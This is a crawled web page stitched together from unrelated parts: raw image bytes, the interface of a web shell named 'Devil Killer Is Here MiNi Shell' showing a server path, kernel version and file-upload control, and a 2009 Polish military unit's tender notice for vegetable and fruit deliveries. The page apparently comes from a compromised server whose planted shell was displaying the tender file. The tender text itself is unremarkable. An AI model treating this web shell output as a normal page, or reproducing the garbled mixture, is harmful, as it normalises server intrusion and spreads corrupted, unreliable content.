JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/328114-N-2009.html

<p class="kh_header"><b>Sieradz: Dostawy owoców, warzyw i podobnych produktów w latach 2009/2010</b><br>
<b>Numer ogłoszenia: 328114 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1551 , ul. Wojska Polskiego 78, 98-200 Sieradz, woj. łódzkie, tel. 043 6567688, faks 043 6567466.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.15sbwd.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy owoców, warzyw i podobnych produktów w latach 2009/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa do magazynu zamawiającego owoców, warzyw i podobnych produktów, określonych według wspólnego słownika zamówień (CPV): 15300000-1 owoce, warzywa i podobne produkty; z podziałem na części, w następujących ilościach:
Część 1 -dostawy warzyw przetworzonych 
-Kapusta kwaszona 3000 kg	-Ogórki kwaszone 4000 kg Arkusz kalkulacyjny - załącznik nr 2 do SIWZ.
Część 2 -dostawy ziemniaków jadalnych 40000 kg
Arkusz kalkulacyjny - załącznik nr 3 do SIWZ.
Część 3 -dostawy warzyw: 
-Marchew jadalna świeża 5000 kg - Pietruszka korzeń 1000 kg
Arkusz kalkulacyjny - załącznik nr 4 do SIWZ.
Część 4 - dostawy warzyw:
- Buraki czerwone	(ćwikłowe) 6000 kg
-Cebula biała świeża 2500 kg
Arkusz kalkulacyjny - załącznik nr 5 do SIWZ.	
Część 5 -dostawy warzyw:
- Seler świeży 2200 kg - Por świeży 1300 kg
Arkusz kalkulacyjny - załącznik nr 6 do SIWZ.	
Część 6 -dostawy kapusty:
- Kapusta biała świeża 8000 kg
Arkusz kalkulacyjny - załącznik nr 7 do SIWZ.
Część 7 - dostawy jabłek (gatunek 1)	5000 kg
Arkusz kalkulacyjny - załącznik nr 8 do SIWZ.
Wymagania jakościowe:
Towar ma być świeży, w I gatunku i zgodny ze wskazanymi w SIWZ normami.
Ogórek kwaszony - w całości, twarde, PN-A-77701:1997
Opakowania stanowią wiadra wykonane z materiałów opakowaniowych przeznaczonych do kontaktu z żywnością od 10kg do 20kg.
Opakowania powinny zabezpieczać produkt przed zniszczeniem i zanieczyszczeniem, powinny być czyste, bez obcych zapachów i uszkodzeń mechanicznych. 
Okres przydatności do spożycia ogórków kwaszonych deklarowany przez producenta powinien wynosić nie mniej niż 1 miesiąc od daty dostawy do magazynu odbiorcy wojskowego.
Na opakowaniu jednostkowym należy podać następujące informacje:
-nazwę produktu,
-termin przydatności do spożycia,
-nazwę dostawcy - producenta, adres,
-zawartość netto,
-masę netto produktu po odcieku,
-warunki przechowywania,
-oznaczenie partii produkcyjnej,
-klasę jakości handlowej oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Kapusta kwaszona - PN-A-77700:2006
Opakowania stanowią wiadra wykonane z materiałów opakowaniowych przeznaczonych do kontaktu z żywnością od 10kg do 20kg.
Opakowania powinny zabezpieczać produkt przed zniszczeniem i zanieczyszczeniem, powinny być czyste, bez obcych zapachów i uszkodzeń mechanicznych. 
Na opakowaniu jednostkowym należy podać następujące informacje:
-nazwę produktu,
-termin przydatności do spożycia,
-nazwę dostawcy - producenta, adres,
-zawartość netto,
-warunki przechowywania,
-oznaczenie partii produkcyjnej,
-klasę jakości handlowej oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Okres przydatności do spożycia ogórków kwaszonych deklarowany przez producenta powinien wynosić nie mniej niż 1 miesiąc od daty dostawy do magazynu odbiorcy wojskowego.
Ziemniaki - dostawy w workach raszlowych po 15 kg, ziemniaki o średnicy min 5 cm, bez kłączy i zanieczyszczeń, PN-75/R-74450
Buraki czerwone - bez liści, PN-72/R-75360 
Opakowania stanowią worki raszlowe od 5kg do 15kg wykonane z materiałów opakowaniowych przeznaczonych do kontaktu z żywnością.
Opakowania powinny być całe, czyste, bez obcych zapachów, zabrudzeń i pleśni. 
Do partii dostawczej należy dołączyć specyfikację zawierającą następujące informacje:
-nazwę produktu,
-masę netto,
-nazwę dostawcy - producenta, adres,
-kraj pochodzenia,
-warunki przechowywania oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Okres przydatności do spożycia buraków ćwikłowych deklarowany przez producenta powinien wynosić nie mniej niż 14 dni od daty dostawy do magazynu odbiorcy wojskowego.
Cebula - PN-72/R-75357 
Opakowania stanowią worki raszlowe od 5kg do 15kg wykonane z materiałów opakowaniowych przeznaczonych do kontaktu z żywnością.
Opakowania powinny być całe, czyste, bez obcych zapachów, zabrudzeń i pleśni. 
Do każdej partii dostawczej należy dołączyć specyfikację zawierającą następujące informacje:
-nazwę produktu,
-masę netto,
-nazwę dostawcy - producenta, adres,
-kraj pochodzenia,
-warunki przechowywania,
-klasę jakości handlowej oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Okres przydatności do spożycia cebuli deklarowany przez producenta powinien wynosić nie mniej niż 14 dni od daty dostawy do magazynu odbiorcy wojskowego.
Marchew - bez liści, PN-72/R-75358 
Opakowania stanowią worki raszlowe od 5kg do 15kg wykonane z materiałów opakowaniowych przeznaczonych do kontaktu z żywnością.
Opakowania powinny być całe, czyste, bez obcych zapachów, zabrudzeń i pleśni. 
Do każdej partii dostawczej należy dołączyć specyfikację zawierającą następujące informacje:
-nazwę produktu,
-nazwę dostawcy - producenta, adres,
-masę netto,
-kraj  pochodzenia,
-warunki przechowywania,
-klasę jakości handlowej oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Okres przydatności do spożycia marchwi deklarowany przez producenta powinien wynosić nie mniej niż 14 dni od daty dostawy do magazynu odbiorcy wojskowego.
Pietruszka - PN-R-75370:1996 
Opakowania stanowią worki raszlowe od 5kg do 15kg wykonane z materiałów opakowaniowych przeznaczonych do kontaktu z żywnością.
Opakowania powinny być całe, czyste, bez obcych zapachów, zabrudzeń i pleśni. 
Do każdej partii dostawczej należy dołączyć specyfikację zawierającą następujące informacje:
-nazwę produktu,
-masę netto,
-nazwę dostawcy - producenta, adres,
-kraj pochodzenia,
-warunki przechowywania,
-klasę jakości handlowej
oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Okres przydatności do spożycia pietruszki deklarowany przez producenta powinien wynosić nie mniej niż 14 dni od daty dostawy do magazynu odbiorcy wojskowego.
Seler - bez liści, PN-R-75371:1996 
Opakowania stanowią worki raszlowe od 10kg do 15kg wykonane z materiałów opakowaniowych przeznaczonych do kontaktu z żywnością.
Opakowania powinny być całe, czyste, bez obcych zapachów, zabrudzeń i pleśni. 
Do każdej partii dostawczej należy dołączyć specyfikację zawierającą następujące informacje:
-nazwę produktu,
-masę netto,
-nazwę dostawcy - producenta, adres,
-kraj pochodzenia,
-warunki przechowywania,
-klasę jakości handlowej
oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Okres przydatności do spożycia selera deklarowany przez producenta powinien wynosić nie mniej niż 14 dni od daty dostawy do magazynu odbiorcy wojskowego.
Por - PN-R-75521:1996 
Opakowania stanowią worki do 10kg wykonane z materiałów opakowaniowych przeznaczonych do kontaktu z żywnością. 
Opakowania powinny być całe, czyste, bez obcych zapachów, zabrudzeń i pleśni. 
Do każdej partii dostawczej należy dołączyć specyfikację zawierającą następujące informacje:
-nazwę produktu,
-masę netto,
-nazwę dostawcy - producenta, adres,
-kraj pochodzenia,
-warunki przechowywania,
-klasę jakości handlowej oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Okres przydatności do spożycia porów deklarowany przez producenta powinien wynosić nie mniej niż 14 dni od daty dostawy do magazynu odbiorcy wojskowego.
Kapusta biała - PN-68/R-75362 
Opakowania stanowią worki raszlowe od 10kg do 20kg wykonane z materiałów opakowaniowych przeznaczonych do kontaktu z żywnością.
Opakowania powinny być całe, czyste, bez obcych zapachów, zabrudzeń i pleśni. 
Do każdej partii dostawczej należy dołączyć specyfikację zawierającą następujące informacje:
-nazwę produktu,
-masę netto,
-nazwę dostawcy - producenta, adres,
-kraj pochodzenia,
-warunki przechowywania,
-klasę jakości handlowej oraz pozostałe informacje zgodnie z aktualnie obowiązującym prawem.
Okres przydatności do spożycia kapusty głowiastej białej deklarowany przez producenta powinien wynosić nie mniej niż 14 dni od daty dostawy do magazynu odbiorcy wojskowego.
Jabłka krajowe - dostawy w skrzynkach od 15kg do20 kg, PN -77/R-75024
2.W celu potwierdzenia spełniania przez oferowane dostawy wymagań określonych przez Zamawiającego, Wykonawca obowiązany jest dołączyć do każdorazowej dostawy świadectwo jakości handlowej wydane przez WIJHARS.
3.Szczegółowy asortyment oraz ilości owoców, warzyw i podobnych produktów przedstawia załącznik nr 2, 3, 4, 5, 6, 7, 8 - arkusz kalkulacyjny, Wycena przedmiotu zamówienia stanowiący integralną część SIWZ.
4.Każdorazowa wielkość poszczególnych dostaw i terminy ich realizacji będą określane przez uprawnionego pracownika Zamawiającego telefonicznie lub faxem z wyprzedzeniem 2-dniowym. Dostawy będą realizowane w godz.8 00 -12 00.
5.Przedmiot zamówienia musi być wytworzony i dostarczony zgodnie z niżej wymienionymi normami i przepisami:
-Ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia 
(Dz. U. 2006.171.1225 z późn. zm.) ;
-Ustawą z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych (Dz. U. 2000.5.44) z późniejszymi zmianami
-Rozporządzeniem ministra zdrowia z dnia 24 stycznia 2007 r. w sprawie wykazu towarów, które podlegają granicznej kontroli sanitarnej 
(Dz. U. 2007. Nr 20 poz. 122);
-Ustawą z dnia 17 grudnia 2004 r. o rejestracji i ochronie nazw i oznaczeń produktów rolnych i środków spożywczych oraz produktach tradycyjnych 
(Dz. U. 2005 Nr 10 poz. 68).
-rozporządzenia (WE) Nr 178/2002 Parlamentu Europejskiego i Rady Ministra dnia 28 stycznia 2002 r. ustalające ogólne zasady i wymagania prawa żywnościowego, powołujące Europejski Urząd ds. bezpieczeństwa żywności oraz ustanawiające procedury w zakresie bezpieczeństwa żywności;
-rozporządzenia (WE) Nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych;
-rozporządzenia (WE) Nr 1935/2004 Parlamentu Europejskiego i Rady z dnia 27 października 2004 r., w sprawie materiałów i wyrobów przeznaczonych do kontaktu z żywnością oraz uchylające Dyrektywy 80/590/EWG I 89/109/EWG;
-rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 r. w sprawie znakowania środków spożywczych (Dz. U.2007 Nr 137, poz. 966 ze zm.).
-rozporządzeniem ministra zdrowia z dnia 24 stycznia 2007 w sprawie wykazu towarów, które podlegają granicznej kontroli sanitarnej (Dz. U. 2007.20.122 ze zm.);.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.11.10-0, 15.33.10.00-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.11.11-7, 03.22.14.10-3, 03.22.23.21-9, 03.21.21.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2) posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych.
2. Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oferty oraz załączonych dokumentów i wykluczy z postępowania Wykonawców, którzy:
1) złożą nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
2) nie złożą wymaganych oświadczeń o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków wymienionych w punkcie X SIWZ;
3) nie zgodzą się na przedłużenie okresu związania ofertą; 
3. Zamawiający wezwie Wykonawców, którzy w wyznaczonym terminie nie złożą dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania. Złożone na wezwanie przez Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu, nie później niż w dniu     w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert. (art. 26 ust. 3 Prawa zamówień publicznych).
4. Zamawiający niezwłocznie po wyborze najkorzystniejszej oferty zawiadamia Wykonawcę o wykluczeniu z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne. 
5. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą. 
6. Zamawiający odrzuca ofertę, jeżeli wystąpi przynajmniej jedna przesłanka unormowana 
w art. 89 ust. 1 Prawa zamówień publicznych w brzmieniu:
1)jest niezgodna z ustawą.
2)jej treść nie odpowiada treści Specyfikacji Istotnych Warunków Zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3.
3)jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów 
o zwalczaniu nieuczciwej konkurencji.
4)zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia. 
5)została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu 
o udzielenie zamówienia lub nie zaproszonego do składania ofert.
6)zawiera błędy w obliczeniu ceny.
7)wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodzi się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3.
8)jest nieważna na podstawie odrębnych przepisów.
7. Zamawiający niezwłocznie po wyborze najkorzystniejszej oferty zawiadamia wszystkich Wykonawców o odrzuceniu ofert, podając uzasadnienie faktyczne i prawne. 
8. Zgodnie z art. 23 ust. p.z.p. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty i załączniki:
1.Podpisane oświadczenia o nie podleganiu wykluczeniu z postępowania w sprawie udzielenia zamówienia (art. 24 ust. 2 pkt 3 Prawa zamówień publicznych) (załącznik nr 10);
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (§ 1 ust. 1 pkt 1 rozporządzenia z dnia 19.05.2006 r., Dz. U. Nr 87, poz. 605);
lub aktualne zaświadczenie z Urzędu Miasta, Gminy lub wójta gminy o posiadaniu gospodarstwa rolnego - dotyczy rolników, w rozumieniu przepisów ustawy z dnia 20 grudnia 1990 r. o ubezpieczeniu społecznym rolników (Dz.U. 2008 Nr 50 poz. 291 ze zm.);
3.Aktualną polisę ubezpieczeniową OC (ważną przez cały okres związania umową) w zakresie prowadzonej działalności gospodarczej, posiadającej rozszerzony zakres ubezpieczenia od odpowiedzialności cywilnej, za szkody osobowe lub rzeczowe wyrządzone przez produkty wyprodukowane, dostarczone, sprzedane przez ubezpieczonego oraz spowodowane przez nie wykonanie lub nienależne wykonanie zamówienia w okresie ubezpieczenia;
4.Oświadczenie Wykonawcy (załącznik nr 12), że środki transportu spełniają wymogi Rozporządzenia Ministra Zdrowia z dnia 19 grudnia 2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności, substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności (Dz.U. Nr 21 poz. 179 z 2003 r.) zgodnie z ustawą w zakresie bezpieczeństwie żywności i żywienia - (Dz.U. z 2006 r. Nr 171 poz. 1225);
5.Wykonawca w celu potwierdzenia spełniania przez oferowane dostawy wymagań określonych przez Zamawiającego, obowiązany jest dołączyć do oferty cenowej świadectwo jakości handlowej wydane przez właściwą miejscowo Wojewódzką Inspekcję Jakości Handlowej Artykułów Rolno-Spożywczych (WIJHARS) na podstawie przeprowadzonych badań potwierdzających, że dostarczane produkty odpowiadają określonym normom oraz specyfikacjom technicznym.
6.W zakresie dostaw warzyw przetworzonych (część 1) Wykonawca w celu potwierdzenia spełniania przez oferowane dostawy wymagań określonych przez Zamawiającego, obowiązany jest dołączyć do oferty cenowej dokument wystawiony na Wykonawcę przez organy upoważnione do urzędowej kontroli żywności lub certyfikat stwierdzający, że u Wykonawcy w produkcji i w obrocie zaoferowanego do dostawy asortymentu został wdrożony i jest stosowany system HACCP.
7.W zakresie dostaw warzyw wytworzonych w ramach produkcji pierwotnej (część 2-7) Wykonawca zobowiązany jest dołączyć potwierdzenie wytwarzania produktów zgodnie z zasadą GMP (Dobra Praktyka Produkcyjna).
8.Jeżeli Wykonawca realizuje dostawy z udziałem podwykonawców i nie posiada dokumentów wymienionych w pkt. 5,6,7 przedstawia w/w dokumenty wystawione dla producentów.
9.W przypadku realizacji dostaw przez podwykonawców, Zamawiający żąda, aby Wykonawca wskazał w ofercie w formie oświadczenia (załącznik nr 11) nazwy i adresy Podwykonawców.
10.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 2, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
11.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 10 ppkt 1), 2) i 3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
12. W przypadku Wykonawców wspólnie ubiegających się o zamówienie do oferty załączyć dokumenty:
1)umowę regulującą współpracę Wykonawców występujących wspólnie, w której ustanawia się pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego
2)oświadczenia i dokumenty wymienione w punktach 1 - 10 dla każdego Wykonawcy z osobna.
Wymagane dokumenty należy przedstawić w formie oryginałów albo kopii. Dokumenty złożone w formie kopii muszą być opatrzone klauzulą za zgodność 
z oryginałem i poświadczone za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy w obrocie gospodarczym..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.15sbwd.internetdsl.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 1551 Sieradz
ul. Wojska Polskiego 78
98-200 Sieradz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2009 godzina 09:00, miejsce: Jednostka Wojskowa Nr 1551 Sieradz
ul. Wojska Polskiego 78
98-200 Sieradz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - - dostawy warzyw przetworzonych 
Kapusta kwaszona	
Ogórki kwaszone.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kapusta kwaszona	3000 kg	
Ogórki kwaszone		4000 kg
Arkusz kalkulacyjny - załącznik nr 2 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.10.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 -dostawy ziemniaków jadalnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 -dostawy ziemniaków jadalnych        40000 kg
Arkusz kalkulacyjny - załącznik nr 3 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3 - dostawy warzyw: 
Marchew jadalna świeża
Pietruszka korzeń.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Marchew jadalna świeża	5000 kg 
Pietruszka korzeń		1000 kg
Arkusz kalkulacyjny - załącznik nr 4 do SIWZ..</li>
